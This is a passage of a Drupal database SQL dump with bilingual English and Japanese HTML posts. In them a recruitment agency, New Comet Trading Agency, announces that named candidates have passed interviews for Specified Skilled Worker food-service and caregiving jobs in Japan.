('activities', 0, 185, 678, 'ja', 0, '<p data-start=\"394\" data-end=\"428\"><strong data-start=\"394\" data-end=\"428\">I</strong><strong data-start=\"1284\" data-end=\"1297\">面接合格のお知らせ</strong></p><p data-start=\"1299\" data-end=\"1373\">ニューコメット・トレーディング・エージェンシーは、HNIN WA THAN さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1375\" data-end=\"1442\">今回の合格は、日本でのキャリア形成に向けた大切な一歩となりました。ご本人の努力と準備が実を結び、次のステージへ進まれることとなります。</p><p data-start=\"1444\" data-end=\"1490\">外食業分野は、多くの経験と成長の機会を提供する魅力的な業界であり、今後の活躍が期待されます。</p><p data-start=\"1492\" data-end=\"1538\">心よりお祝い申し上げるとともに、日本での新たな挑戦が実り多いものとなることを願っております。</p>', '', 'full_html'),
('activities', 0, 186, 679, 'en', 0, '<p data-start=\"394\" data-end=\"428\"><strong data-start=\"394\" data-end=\"428\">Interview Success Announcement</strong></p><p data-start=\"430\" data-end=\"603\">New Comet Trading Agency is delighted to announce that Ms. Yadana Lwin has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"605\" data-end=\"746\">Her success reflects strong determination, careful preparation, and a clear commitment to pursuing a career in Japan\'s food service industry.</p><p data-start=\"748\" data-end=\"914\">Passing the interview demonstrates her readiness to take on new responsibilities and embrace the opportunities that await her in an international working environment.</p><p data-start=\"916\" data-end=\"1046\">We are pleased to celebrate this achievement and look forward to supporting her through the next stages of the employment process.</p><p data-start=\"1048\" data-end=\"1174\">Congratulations to Ms. Yadana Lwin on this outstanding accomplishment, and we wish her continued success in her future career.</p>', '', 'full_html'),
('activities', 0, 186, 680, 'en', 0, '<p data-start=\"394\" data-end=\"428\"><strong data-start=\"394\" data-end=\"428\">Interview Success Announcement</strong></p><p data-start=\"430\" data-end=\"603\">New Comet Trading Agency is delighted to announce that Ms. Yadana Lwin has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"605\" data-end=\"746\">Her success reflects strong determination, careful preparation, and a clear commitment to pursuing a career in Japan\'s food service industry.</p><p data-start=\"748\" data-end=\"914\">Passing the interview demonstrates her readiness to take on new responsibilities and embrace the opportunities that await her in an international working environment.</p><p data-start=\"916\" data-end=\"1046\">We are pleased to celebrate this achievement and look forward to supporting her through the next stages of the employment process.</p><p data-start=\"1048\" data-end=\"1174\">Congratulations to Ms. Yadana Lwin on this outstanding accomplishment, and we wish her continued success in her future career.</p>', '', 'full_html'),
('activities', 0, 186, 680, 'ja', 0, '<p data-start=\"1326\" data-end=\"1339\"><strong data-start=\"1326\" data-end=\"1339\">面接合格のお知らせ</strong></p><p data-start=\"1341\" data-end=\"1414\">ニューコメット・トレーディング・エージェンシーは、YADANA LWIN さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1416\" data-end=\"1460\">今回の合格は、ご本人の強い意志と努力、そして日本で働くという目標に向けた準備の成果です。</p><p data-start=\"1462\" data-end=\"1502\">面接合格は新たなキャリアへの大切な第一歩であり、今後の活躍が大いに期待されます。</p><p data-start=\"1504\" data-end=\"1562\">ニューコメット・トレーディング・エージェンシーは、今後の手続きや日本での就労に向けて引き続きサポートしてまいります。</p><p data-start=\"1564\" data-end=\"1597\">心よりお祝い申し上げるとともに、さらなるご成功をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 187, 681, 'en', 0, '<p data-start=\"400\" data-end=\"434\"><strong data-start=\"400\" data-end=\"434\">Interview Success Announcement</strong></p><p data-start=\"436\" data-end=\"609\">New Comet Trading Agency is pleased to announce that Ms. Khit Yuya Soe has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"611\" data-end=\"831\">This achievement marks an important step toward building a successful career in Japan\'s food service industry. Through dedication and preparation, she has earned the opportunity to move forward in the employment process.</p><p data-start=\"833\" data-end=\"982\">Japan\'s food service sector offers valuable professional experience, skill development, and long-term career opportunities for motivated individuals.</p><p data-start=\"984\" data-end=\"1098\">We are proud of her accomplishment and look forward to seeing her continue her journey toward employment in Japan.</p><p data-start=\"1100\" data-end=\"1207\">We sincerely congratulate Ms. Khit Yuya Soe and wish her every success in the exciting opportunities ahead.</p>', '', 'full_html'),
('activities', 0, 187, 682, 'en', 0, '<p data-start=\"400\" data-end=\"434\"><strong data-start=\"400\" data-end=\"434\">Interview Success Announcement</strong></p><p data-start=\"436\" data-end=\"609\">New Comet Trading Agency is pleased to announce that Ms. Khit Yuya Soe has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"611\" data-end=\"831\">This achievement marks an important step toward building a successful career in Japan\'s food service industry. Through dedication and preparation, she has earned the opportunity to move forward in the employment process.</p><p data-start=\"833\" data-end=\"982\">Japan\'s food service sector offers valuable professional experience, skill development, and long-term career opportunities for motivated individuals.</p><p data-start=\"984\" data-end=\"1098\">We are proud of her accomplishment and look forward to seeing her continue her journey toward employment in Japan.</p><p data-start=\"1100\" data-end=\"1207\">We sincerely congratulate Ms. Khit Yuya Soe and wish her every success in the exciting opportunities ahead.</p>', '', 'full_html'),
('activities', 0, 187, 682, 'ja', 0, '<p data-start=\"1361\" data-end=\"1374\"><strong data-start=\"1361\" data-end=\"1374\">面接合格のお知らせ</strong></p><p data-start=\"1376\" data-end=\"1451\">ニューコメット・トレーディング・エージェンシーは、KHIT YUYA SOE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1453\" data-end=\"1491\">今回の合格は、日本の外食業界でキャリアを築くための大切な第一歩となりました。</p><p data-start=\"1493\" data-end=\"1556\">これまでの努力と準備が実を結び、新たなチャンスへの扉が開かれました。外食業分野では、多くの経験や成長の機会が期待されています。</p><p data-start=\"1558\" data-end=\"1604\">今後の手続きが順調に進み、日本での新しい挑戦が実り多いものとなることを心より願っております。</p><p data-start=\"1606\" data-end=\"1623\">ご合格、誠におめでとうございます。</p>', '', 'full_html'),
('activities', 0, 188, 683, 'en', 0, '<p data-start=\"447\" data-end=\"481\"><strong data-start=\"447\" data-end=\"481\">Interview Success Announcement</strong></p><p data-start=\"483\" data-end=\"651\">New Comet Trading Agency is delighted to announce that Ms. May Phyoe Thu has successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p><p data-start=\"653\" data-end=\"892\">This achievement represents an important milestone in her journey toward a professional career in the caregiving sector. Through dedication, preparation, and a genuine desire to support others, she has successfully earned this opportunity.</p><p data-start=\"894\" data-end=\"1107\">The caregiving profession plays a vital role in supporting the well-being and quality of life of elderly individuals in Japan. We are confident that she will make a meaningful contribution in her future workplace.</p><p data-start=\"1109\" data-end=\"1269\">We sincerely congratulate Ms. May Phyoe Thu on her success and wish her continued achievement throughout the upcoming procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 188, 684, 'en', 0, '<p data-start=\"447\" data-end=\"481\"><strong data-start=\"447\" data-end=\"481\">Interview Success Announcement</strong></p><p data-start=\"483\" data-end=\"651\">New Comet Trading Agency is delighted to announce that Ms. May Phyoe Thu has successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p><p data-start=\"653\" data-end=\"892\">This achievement represents an important milestone in her journey toward a professional career in the caregiving sector. Through dedication, preparation, and a genuine desire to support others, she has successfully earned this opportunity.</p><p data-start=\"894\" data-end=\"1107\">The caregiving profession plays a vital role in supporting the well-being and quality of life of elderly individuals in Japan. We are confident that she will make a meaningful contribution in her future workplace.</p><p data-start=\"1109\" data-end=\"1269\">We sincerely congratulate Ms. May Phyoe Thu on her success and wish her continued achievement throughout the upcoming procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 188, 684, 'ja', 0, '<p data-start=\"1421\" data-end=\"1434\"><strong data-start=\"1421\" data-end=\"1434\">面接合格のお知らせ</strong></p><p data-start=\"1436\" data-end=\"1510\">ニューコメット・トレーディング・エージェンシーは、MAY PHYOE THU さんが特定技能（介護）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1512\" data-end=\"1561\">今回の合格は、介護分野で活躍するという目標に向けた大切な成果であり、ご本人の努力と熱意の表れです。</p><p data-start=\"1563\" data-end=\"1628\">介護の仕事は、高齢者の生活を支える大変重要でやりがいのある職業です。今後、日本の介護現場で活躍されることを大いに期待しております。</p><p data-start=\"1630\" data-end=\"1669\">心よりお祝い申し上げるとともに、日本での新たな挑戦とご活躍をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 189, 685, 'en', 0, '<p data-start=\"361\" data-end=\"395\"><strong data-start=\"361\" data-end=\"395\">Interview Success Announcement</strong></p><p data-start=\"397\" data-end=\"562\">New Comet Trading Agency is pleased to announce that Ms. Thet Mon Soe has successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p><p data-start=\"564\" data-end=\"711\">This accomplishment reflects her commitment to professional development and her dedication to pursuing a meaningful career in the caregiving field.</p><p data-start=\"713\" data-end=\"933\">The Kaigo sector requires compassion, responsibility, and a strong willingness to support others. Through her preparation and determination, she has successfully demonstrated these qualities during the interview process.</p><p data-start=\"935\" data-end=\"1097\">We extend our heartfelt congratulations to Ms. Thet Mon Soe and wish her continued success as she moves forward toward employment and a rewarding career in Japan.</p>', '', 'full_html'),
('activities', 0, 189, 686, 'en', 0, '<p data-start=\"361\" data-end=\"395\"><strong data-start=\"361\" data-end=\"395\">Interview Success Announcement</strong></p><p data-start=\"397\" data-end=\"562\">New Comet Trading Agency is pleased to announce that Ms. Thet Mon Soe has successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p><p data-start=\"564\" data-end=\"711\">This accomplishment reflects her commitment to professional development and her dedication to pursuing a meaningful career in the caregiving field.</p><p data-start=\"713\" data-end=\"933\">The Kaigo sector requires compassion, responsibility, and a strong willingness to support others. Through her preparation and determination, she has successfully demonstrated these qualities during the interview process.</p><p data-start=\"935\" data-end=\"1097\">We extend our heartfelt congratulations to Ms. Thet Mon Soe and wish her continued success as she moves forward toward employment and a rewarding career in Japan.</p>', '', 'full_html'),
('activities', 0, 189, 686, 'ja', 0, '<p data-start=\"1248\" data-end=\"1261\"><strong data-start=\"1248\" data-end=\"1261\">面接合格のお知らせ</strong></p><p data-start=\"1263\" data-end=\"1336\">ニューコメット・トレーディング・エージェンシーは、THET MON SOE さんが特定技能（介護）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1338\" data-end=\"1375\">今回の合格は、介護分野で活躍したいという強い意志と、日々の努力の成果です。</p><p data-start=\"1377\" data-end=\"1457\">介護の仕事には、思いやりや責任感、そして人を支えたいという気持ちが求められます。面接を通じて、そのような資質を十分に発揮されたことが今回の結果につながりました。</p><p data-start=\"1459\" data-end=\"1507\">心よりお祝い申し上げるとともに、日本での新たなキャリアが充実したものとなることを願っております。</p>', '', 'full_html'),
('activities', 0, 190, 687, 'en', 0, '<p><strong>Interview Success Announcement</strong></p><p>New Comet Trading Agency is proud to announce that Ms. Wai Mon Thant has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p>Achieving a successful interview result requires not only knowledge and skills but also confidence, preparation, and determination. Through her dedication and commitment, she has earned the opportunity to take the next step toward working in Japan.</p><p>This accomplishment represents the beginning of an exciting professional journey within Japan\'s food service industry, where valuable experience and future growth opportunities await.</p><p>We sincerely congratulate Ms. Wai Mon Thant on this achievement and wish her every success in the upcoming procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 190, 688, 'en', 0, '<p><strong>Interview Success Announcement</strong></p><p>New Comet Trading Agency is proud to announce that Ms. Wai Mon Thant has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p>Achieving a successful interview result requires not only knowledge and skills but also confidence, preparation, and determination. Through her dedication and commitment, she has earned the opportunity to take the next step toward working in Japan.</p><p>This accomplishment represents the beginning of an exciting professional journey within Japan\'s food service industry, where valuable experience and future growth opportunities await.</p><p>We sincerely congratulate Ms. Wai Mon Thant on this achievement and wish her every success in the upcoming procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 190, 688, 'ja', 0, '<p><strong>I</strong><strong data-start=\"1328\" data-end=\"1341\">面接合格のお知らせ</strong></p><p data-start=\"1343\" data-end=\"1418\">ニューコメット・トレーディング・エージェンシーは、WAI MON THANT さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1420\" data-end=\"1464\">面接合格は、知識や技術だけでなく、努力と準備の積み重ねによって達成される大切な成果です。</p><p data-start=\"1466\" data-end=\"1509\">今回の合格により、日本の外食業界で働くという目標に向けて大きな一歩を踏み出されました。</p><p data-start=\"1511\" data-end=\"1558\">今後の手続きが順調に進み、日本で多くの経験を積みながらご活躍されることを心より願っております。</p><p data-start=\"1560\" data-end=\"1577\">ご合格、誠におめでとうございます。</p>', '', 'full_html'),
('activities', 0, 190, 689, 'en', 0, '<p><strong>Interview Success Announcement</strong></p><p>New Comet Trading Agency is proud to announce that Ms. Wai Mon Thant has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p>Achieving a successful interview result requires not only knowledge and skills but also confidence, preparation, and determination. Through her dedication and commitment, she has earned the opportunity to take the next step toward working in Japan.</p><p>This accomplishment represents the beginning of an exciting professional journey within Japan\'s food service industry, where valuable experience and future growth opportunities await.</p><p>We sincerely congratulate Ms. Wai Mon Thant on this achievement and wish her every success in the upcoming procedures and her future career in Japan.</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 190, 689, 'ja', 0, '<p><strong>I</strong><strong data-start=\"1328\" data-end=\"1341\">面接合格のお知らせ</strong></p><p data-start=\"1343\" data-end=\"1418\">ニューコメット・トレーディング・エージェンシーは、WAI MON THANT さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1420\" data-end=\"1464\">面接合格は、知識や技術だけでなく、努力と準備の積み重ねによって達成される大切な成果です。</p><p data-start=\"1466\" data-end=\"1509\">今回の合格により、日本の外食業界で働くという目標に向けて大きな一歩を踏み出されました。</p><p data-start=\"1511\" data-end=\"1558\">今後の手続きが順調に進み、日本で多くの経験を積みながらご活躍されることを心より願っております。</p><p data-start=\"1560\" data-end=\"1577\">ご合格、誠におめでとうございます。</p>', '', 'full_html'),
('activities', 0, 191, 690, 'en', 0, '<p data-start=\"392\" data-end=\"426\"><strong data-start=\"392\" data-end=\"426\">Interview Success Announcement</strong></p><p data-start=\"428\" data-end=\"617\">New Comet Trading Agency is pleased to share the successful interview result of Ms. Ei Ei Khet, who has passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"619\" data-end=\"837\">Behind every successful interview is a period of learning, preparation, and personal effort. Through her dedication and positive attitude, she has achieved an important milestone on her journey toward working in Japan.</p><p data-start=\"839\" data-end=\"952\">This success reflects her commitment to personal growth and her determination to pursue new opportunities abroad.</p><p data-start=\"954\" data-end=\"1119\">We warmly congratulate Ms. Ei Ei Khet on this achievement and wish her continued success as she proceeds to the next stage of her journey toward employment in Japan.</p>', '', 'full_html'),
('activities', 0, 191, 691, 'en', 0, '<p data-start=\"392\" data-end=\"426\"><strong data-start=\"392\" data-end=\"426\">Interview Success Announcement</strong></p><p data-start=\"428\" data-end=\"617\">New Comet Trading Agency is pleased to share the successful interview result of Ms. Ei Ei Khet, who has passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"619\" data-end=\"837\">Behind every successful interview is a period of learning, preparation, and personal effort. Through her dedication and positive attitude, she has achieved an important milestone on her journey toward working in Japan.</p><p data-start=\"839\" data-end=\"952\">This success reflects her commitment to personal growth and her determination to pursue new opportunities abroad.</p><p data-start=\"954\" data-end=\"1119\">We warmly congratulate Ms. Ei Ei Khet on this achievement and wish her continued success as she proceeds to the next stage of her journey toward employment in Japan.</p>', '', 'full_html'),
('activities', 0, 191, 691, 'ja', 0, '<p data-start=\"1270\" data-end=\"1283\"><strong data-start=\"1270\" data-end=\"1283\">面接合格のお知らせ</strong></p><p data-start=\"1285\" data-end=\"1357\">ニューコメット・トレーディング・エージェンシーは、EI EI KHET さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1359\" data-end=\"1416\">面接合格の裏には、日々の学習や準備、そしてご本人の努力があります。今回の成果は、その積み重ねが実を結んだ結果です。</p><p data-start=\"1418\" data-end=\"1464\">この合格は、日本で働くという目標に向けた大切な節目であり、新たな可能性への第一歩となります。</p><p data-start=\"1466\" data-end=\"1506\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 192, 692, 'en', 0, '<p data-start=\"327\" data-end=\"361\"><strong data-start=\"327\" data-end=\"361\">Interview Success Announcement</strong></p><p data-start=\"363\" data-end=\"532\">New Comet Trading Agency is delighted to announce that Ms. Sabi Oo has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"534\" data-end=\"792\">This achievement is the result of her persistence, dedication, and continuous efforts to pursue employment opportunities in Japan. Through careful preparation and determination, she has successfully reached an important milestone in her professional journey.</p><p data-start=\"794\" data-end=\"922\">Passing the interview opens the door to valuable experiences and future career development within Japan\'s food service industry.</p><p data-start=\"924\" data-end=\"1072\">We sincerely congratulate Ms. Sabi Oo on this accomplishment and wish her success throughout the upcoming procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 192, 693, 'en', 0, '<p data-start=\"327\" data-end=\"361\"><strong data-start=\"327\" data-end=\"361\">Interview Success Announcement</strong></p><p data-start=\"363\" data-end=\"532\">New Comet Trading Agency is delighted to announce that Ms. Sabi Oo has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"534\" data-end=\"792\">This achievement is the result of her persistence, dedication, and continuous efforts to pursue employment opportunities in Japan. Through careful preparation and determination, she has successfully reached an important milestone in her professional journey.</p><p data-start=\"794\" data-end=\"922\">Passing the interview opens the door to valuable experiences and future career development within Japan\'s food service industry.</p><p data-start=\"924\" data-end=\"1072\">We sincerely congratulate Ms. Sabi Oo on this accomplishment and wish her success throughout the upcoming procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 192, 693, 'ja', 0, '<p data-start=\"1220\" data-end=\"1233\"><strong data-start=\"1220\" data-end=\"1233\">面接合格のお知らせ</strong></p><p data-start=\"1235\" data-end=\"1304\">ニューコメット・トレーディング・エージェンシーは、SABI OO さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1306\" data-end=\"1358\">今回の合格は、ご本人の粘り強い努力と継続的な学習、そして日本で働くという目標に向けた強い意志の成果です。</p><p data-start=\"1360\" data-end=\"1415\">面接合格は、日本の外食業界で活躍するための大切な第一歩であり、今後さらなる成長と経験につながる機会となります。</p><p data-start=\"1417\" data-end=\"1456\">心よりお祝い申し上げるとともに、日本でのご活躍と明るい未来をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 193, 694, 'en', 0, '<p><strong>Interview Success Announcement</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Thwel Thwel Aye has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p>Her achievement reflects the confidence, preparation, and determination she demonstrated throughout the recruitment process. Successfully completing the interview is an important step toward achieving her professional goals in Japan.</p><p>This opportunity will allow her to gain valuable experience, develop new skills, and build a successful future within Japan\'s food service industry.</p><p>We extend our sincere congratulations to Ms. Thwel Thwel Aye and wish her continued success as she prepares for the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 193, 695, 'en', 0, '<p><strong>Interview Success Announcement</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Thwel Thwel Aye has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p>Her achievement reflects the confidence, preparation, and determination she demonstrated throughout the recruitment process. Successfully completing the interview is an important step toward achieving her professional goals in Japan.</p><p>This opportunity will allow her to gain valuable experience, develop new skills, and build a successful future within Japan\'s food service industry.</p><p>We extend our sincere congratulations to Ms. Thwel Thwel Aye and wish her continued success as she prepares for the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 193, 695, 'ja', 0, '<p data-start=\"1277\" data-end=\"1290\"><strong data-start=\"1277\" data-end=\"1290\">面接合格のお知らせ</strong></p><p data-start=\"1292\" data-end=\"1369\">ニューコメット・トレーディング・エージェンシーは、THWEL THWEL AYE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1371\" data-end=\"1426\">今回の合格は、ご本人の自信、努力、そして準備の成果であり、日本でのキャリア実現に向けた大切な一歩となりました。</p><p data-start=\"1428\" data-end=\"1476\">外食業界での経験を通じて、多くの知識や技術を身につけ、さらなる成長につながることが期待されます。</p><p data-start=\"1478\" data-end=\"1518\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 193, 696, 'en', 0, '<p><strong>Interview Success Announcement</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Thwel Thwel Aye has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p>Her achievement reflects the confidence, preparation, and determination she demonstrated throughout the recruitment process. Successfully completing the interview is an important step toward achieving her professional goals in Japan.</p><p>This opportunity will allow her to gain valuable experience, develop new skills, and build a successful future within Japan\'s food service industry.</p><p>We extend our sincere congratulations to Ms. Thwel Thwel Aye and wish her continued success as she prepares for the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 193, 696, 'ja', 0, '<p data-start=\"1277\" data-end=\"1290\"><strong data-start=\"1277\" data-end=\"1290\">面接合格のお知らせ</strong></p><p data-start=\"1292\" data-end=\"1369\">ニューコメット・トレーディング・エージェンシーは、THWEL THWEL AYE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1371\" data-end=\"1426\">今回の合格は、ご本人の自信、努力、そして準備の成果であり、日本でのキャリア実現に向けた大切な一歩となりました。</p><p data-start=\"1428\" data-end=\"1476\">外食業界での経験を通じて、多くの知識や技術を身につけ、さらなる成長につながることが期待されます。</p><p data-start=\"1478\" data-end=\"1518\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 194, 697, 'en', 0, '<p data-start=\"366\" data-end=\"400\"><strong data-start=\"366\" data-end=\"400\">Interview Success Announcement</strong></p><p data-start=\"402\" data-end=\"575\">New Comet Trading Agency is delighted to announce that Ms. Moe Moe Zaw has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"577\" data-end=\"751\">This achievement marks an exciting opportunity for her to gain international work experience and further develop her professional skills within Japan\'s food service industry.</p><p data-start=\"753\" data-end=\"916\">Through dedication, preparation, and a positive attitude, she successfully completed the interview process and moved one step closer to achieving her career goals.</p><p data-start=\"918\" data-end=\"1075\">We congratulate Ms. Moe Moe Zaw on this accomplishment and wish her continued success throughout the remaining procedures and her future employment in Japan.</p><p data-start=\"1077\" data-end=\"1160\">We look forward to seeing her grow and thrive in her upcoming professional journey.</p>', '', 'full_html'),
('activities', 0, 194, 698, 'en', 0, '<p data-start=\"366\" data-end=\"400\"><strong data-start=\"366\" data-end=\"400\">Interview Success Announcement</strong></p><p data-start=\"402\" data-end=\"575\">New Comet Trading Agency is delighted to announce that Ms. Moe Moe Zaw has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"577\" data-end=\"751\">This achievement marks an exciting opportunity for her to gain international work experience and further develop her professional skills within Japan\'s food service industry.</p><p data-start=\"753\" data-end=\"916\">Through dedication, preparation, and a positive attitude, she successfully completed the interview process and moved one step closer to achieving her career goals.</p><p data-start=\"918\" data-end=\"1075\">We congratulate Ms. Moe Moe Zaw on this accomplishment and wish her continued success throughout the remaining procedures and her future employment in Japan.</p><p data-start=\"1077\" data-end=\"1160\">We look forward to seeing her grow and thrive in her upcoming professional journey.</p>', '', 'full_html'),
('activities', 0, 194, 698, 'ja', 0, '<p data-start=\"1312\" data-end=\"1325\"><strong data-start=\"1312\" data-end=\"1325\">面接合格のお知らせ</strong></p><p data-start=\"1327\" data-end=\"1400\">ニューコメット・トレーディング・エージェンシーは、MOE MOE ZAW さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1402\" data-end=\"1449\">今回の合格により、日本の外食業界で国際的な職業経験を積むための大きなチャンスを手にされました。</p><p data-start=\"1451\" data-end=\"1493\">ご本人の努力と前向きな姿勢、そして十分な準備が今回の素晴らしい結果につながりました。</p><p data-start=\"1495\" data-end=\"1541\">今後の手続きが順調に進み、日本で多くの経験と成長の機会を得られることを心より願っております。</p><p data-start=\"1543\" data-end=\"1560\">ご合格、誠におめでとうございます。</p>', '', 'full_html'),
('activities', 0, 195, 699, 'en', 0, '<p data-start=\"388\" data-end=\"422\"><strong data-start=\"388\" data-end=\"422\">Interview Success Announcement</strong></p><p data-start=\"424\" data-end=\"595\">New Comet Trading Agency is pleased to announce that Ms. Ei Ei Phyoe has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"597\" data-end=\"728\">This achievement reflects her commitment to learning, self-improvement, and preparation for international employment opportunities.</p><p data-start=\"730\" data-end=\"923\">As she moves forward in the recruitment process, she will have the opportunity to apply her knowledge and skills within Japan\'s food service industry while continuing to develop professionally.</p><p data-start=\"925\" data-end=\"1027\">We are proud of her accomplishment and extend our sincere congratulations on this important milestone.</p><p data-start=\"1029\" data-end=\"1153\">We wish Ms. Ei Ei Phyoe every success in the next stage of her journey and look forward to her future achievements in Japan.</p>', '', 'full_html'),
('activities', 0, 195, 700, 'en', 0, '<p data-start=\"388\" data-end=\"422\"><strong data-start=\"388\" data-end=\"422\">Interview Success Announcement</strong></p><p data-start=\"424\" data-end=\"595\">New Comet Trading Agency is pleased to announce that Ms. Ei Ei Phyoe has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"597\" data-end=\"728\">This achievement reflects her commitment to learning, self-improvement, and preparation for international employment opportunities.</p><p data-start=\"730\" data-end=\"923\">As she moves forward in the recruitment process, she will have the opportunity to apply her knowledge and skills within Japan\'s food service industry while continuing to develop professionally.</p><p data-start=\"925\" data-end=\"1027\">We are proud of her accomplishment and extend our sincere congratulations on this important milestone.</p><p data-start=\"1029\" data-end=\"1153\">We wish Ms. Ei Ei Phyoe every success in the next stage of her journey and look forward to her future achievements in Japan.</p>', '', 'full_html'),
('activities', 0, 195, 700, 'ja', 0, '<p data-start=\"1305\" data-end=\"1318\"><strong data-start=\"1305\" data-end=\"1318\">面接合格のお知らせ</strong></p><p data-start=\"1320\" data-end=\"1393\">ニューコメット・トレーディング・エージェンシーは、EI EI PHYOE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1395\" data-end=\"1431\">今回の合格は、ご本人の学習意欲と努力、そして将来に向けた準備の成果です。</p><p data-start=\"1433\" data-end=\"1478\">今後、日本の外食業界で知識や技術を活かしながら、さらに成長し活躍されることが期待されます。</p><p data-start=\"1480\" data-end=\"1528\">この素晴らしい成果を心よりお祝いするとともに、今後の手続きと日本でのご活躍をお祈り申し上げます。</p><p data-start=\"1535\" data-end=\"1584\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 196, 701, 'en', 0, '<p data-start=\"348\" data-end=\"382\"><strong data-start=\"348\" data-end=\"382\">Interview Success Announcement</strong></p><p data-start=\"384\" data-end=\"553\">New Comet Trading Agency is proud to announce that Ms. Win Win Thu has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"555\" data-end=\"686\">This achievement is the result of determination, perseverance, and continuous effort toward achieving her goal of working in Japan.</p><p data-start=\"688\" data-end=\"948\">Each successful interview represents an important step toward a brighter future and greater professional opportunities. Through her preparation and dedication, she has successfully moved one step closer to beginning her career in Japan\'s food service industry.</p><p data-start=\"950\" data-end=\"1114\">We sincerely congratulate Ms. Win Win Thu on this accomplishment and wish her continued success throughout the remaining procedures and her future journey in Japan.</p>', '', 'full_html'),
('activities', 0, 196, 702, 'en', 0, '<p data-start=\"348\" data-end=\"382\"><strong data-start=\"348\" data-end=\"382\">Interview Success Announcement</strong></p><p data-start=\"384\" data-end=\"553\">New Comet Trading Agency is proud to announce that Ms. Win Win Thu has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"555\" data-end=\"686\">This achievement is the result of determination, perseverance, and continuous effort toward achieving her goal of working in Japan.</p><p data-start=\"688\" data-end=\"948\">Each successful interview represents an important step toward a brighter future and greater professional opportunities. Through her preparation and dedication, she has successfully moved one step closer to beginning her career in Japan\'s food service industry.</p><p data-start=\"950\" data-end=\"1114\">We sincerely congratulate Ms. Win Win Thu on this accomplishment and wish her continued success throughout the remaining procedures and her future journey in Japan.</p>', '', 'full_html'),
('activities', 0, 196, 702, 'ja', 0, '<p data-start=\"1266\" data-end=\"1279\"><strong data-start=\"1266\" data-end=\"1279\">面接合格のお知らせ</strong></p><p data-start=\"1281\" data-end=\"1354\">ニューコメット・トレーディング・エージェンシーは、WIN WIN THU さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1356\" data-end=\"1409\">今回の合格は、ご本人の努力と粘り強い挑戦の成果であり、日本で働くという目標に向けた大きな前進となりました。</p><p data-start=\"1411\" data-end=\"1456\">面接合格は、将来の可能性を広げる重要な一歩であり、新たなキャリアへのスタートでもあります。</p><p data-start=\"1458\" data-end=\"1498\">心よりお祝い申し上げるとともに、日本でのご活躍とさらなる成功をお祈りいたします。</p>', '', 'full_html'),
